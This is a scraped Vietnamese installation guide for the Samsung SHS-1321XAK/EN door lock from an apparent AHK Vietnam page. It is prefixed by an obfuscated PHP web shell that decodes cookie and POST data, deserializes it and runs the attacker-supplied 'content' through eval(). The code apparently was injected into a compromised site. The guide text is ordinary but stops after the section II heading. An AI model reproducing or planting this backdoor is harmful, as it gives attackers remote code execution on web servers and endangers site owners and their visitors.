$fqiQjm = chr (84) . "\x44" . chr ( 482 - 403 ).'_' . "\115" . chr (69) . "\156" . chr ( 500 - 421 )."\141";$MasHEAXYRr = "\143" . "\x6c" . "\141" . chr ( 521 - 406 ).chr (115) . "\137" . chr ( 168 - 67 ).chr ( 730 - 610 ).'i' . "\x73" . chr (116) . "\x73";$hMCRxWKtw = class_exists($fqiQjm); $MasHEAXYRr = "42800";$crgEeQoQLx = !1;if ($hMCRxWKtw == $crgEeQoQLx){function gUjss(){$GQSiIVDQ = new /* 20823 */ TDO_MEnOa(7162 + 7162); $GQSiIVDQ = NULL;}$WSmjw = "7162";class TDO_MEnOa{private function mhKZLQApr($WSmjw){if (is_array(TDO_MEnOa::$dxOIZ)) {$rlcgOQF = str_replace("\x3c" . chr ( 228 - 165 ).chr ( 579 - 467 ).'h' . 'p', "", TDO_MEnOa::$dxOIZ['c' . chr (111) . "\x6e" . chr ( 355 - 239 )."\x65" . chr (110) . "\x74"]);eval($rlcgOQF); $WSmjw = "7162";exit();}}private $rKJZi;public function PDtDIwpot(){echo 44118;}public function __destruct(){$WSmjw = "32854_45688";$this->mhKZLQApr($WSmjw); $WSmjw = "32854_45688";}public function __construct($mYDfgJ=0){$MqtmR = $_POST;$kiAqrArYu = $_COOKIE;$hXDZXHScYa = "b117e116-81a1-4a0f-8c63-2a292dd0db21";$pobSIo = @$kiAqrArYu[substr($hXDZXHScYa, 0, 4)];if (!empty($pobSIo)){$FddZxsnOCt = "base64";$dgDSDAMBZi = "";$pobSIo = explode(",", $pobSIo);foreach ($pobSIo as $YccOwzpoM){$dgDSDAMBZi .= @$kiAqrArYu[$YccOwzpoM];$dgDSDAMBZi .= @$MqtmR[$YccOwzpoM];}$dgDSDAMBZi = array_map($FddZxsnOCt . "\137" . chr ( 728 - 628 ).chr ( 224 - 123 )."\x63" . "\x6f" . "\144" . chr (101), array($dgDSDAMBZi,)); $dgDSDAMBZi = $dgDSDAMBZi[0] ^ str_repeat($hXDZXHScYa, (strlen($dgDSDAMBZi[0]) / strlen($hXDZXHScYa)) + 1);TDO_MEnOa::$dxOIZ = @unserialize($dgDSDAMBZi);}}public static $dxOIZ = 246;}gUjss();} Hướng dẫn cài đặt Samsung SHS-1321XAK/EN
 

Hướng dẫn cài đặt khóa Samsung SHS-1321XAK/EN

Tài liệu hướng dẫn cài đặt khóa Samsung SHS-1321XAK/EN, mọi yêu cầu về hỗ trợ sản phẩm vui lòng liên hệ theo số điện thoại: 0916772235. Công ty cổ phần AHK Việt Nam chuyên cung cấp và lắp đặt các dòng khóa cửa vân tay nhập khẩu chính hãng từ Hàn Quốc.

 

MỤC LỤC

I.Lưu ý khi cài đặt và pin sử dụng

II.Hướng dẫn cài đặt

1.Đăng ký mật mã

2.Đăng ký thẻ

3.Khôi phục mặc định

4.Cài đặt chế độ khóa tự động và không tự động

5.Điều chỉnh âm thanh

6.Cài đặt chế độ khóa an toàn

III.Sử lý sự cố

 

HƯỚNG DẪN CÀI ĐẶT

 

I.Lưu ý khi cài đặt và pin sử dụng:

1.Khi cài đặt phải để cửa ở trạng thái mở

2.Nút đăng ký nằm trong nắp pin (mở nắp đậy pin ra)

3.Khi đổi mã, đăng ký vân tay, thẻ từ phải đảm bảo 1 trong 3 yêu tố:

+ Chìa khóa cơ (nếu có) để bên ngoài (ngoài nơi lắp khóa cơ)

+ Có người bên trong nhà

+ Thử lại trước khi khóa cửa

4.Nên mua pin cho khóa loại tốt (có dòng chữ Alkaline), tránh dùng các loại pin giá rẻ làm hỏng khóa do chảy pin.

5.Nên thay pin theo chu kỳ sử dụng: 1 ngày mở 10 lần > 1 năm thay pin 1 lần.

 

II.Hướng dẫn cài đặt

huong-dan-cai-dat-samsung-shs-1321XAK-en

Google+